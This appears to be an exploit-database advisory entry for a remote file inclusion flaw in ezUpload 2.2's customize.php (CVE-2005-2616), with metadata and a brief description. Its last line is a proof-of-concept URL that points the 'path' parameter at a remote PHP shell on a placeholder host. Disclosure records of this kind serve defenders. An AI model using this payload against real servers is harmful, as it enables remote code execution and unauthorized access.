ezUpload 2.2 - 'customize.php?path' Remote File Inclusion
Author: Johnnie Walker
type: webapps
platform: php
port:
date_added: 2005-08-10
date_updated: 2013-06-13
verified: 1
codes: CVE-2005-2616;OSVDB-18765
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/14534/info
ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/ezupload/customize.php?path=http://www.example.com/phpshell?&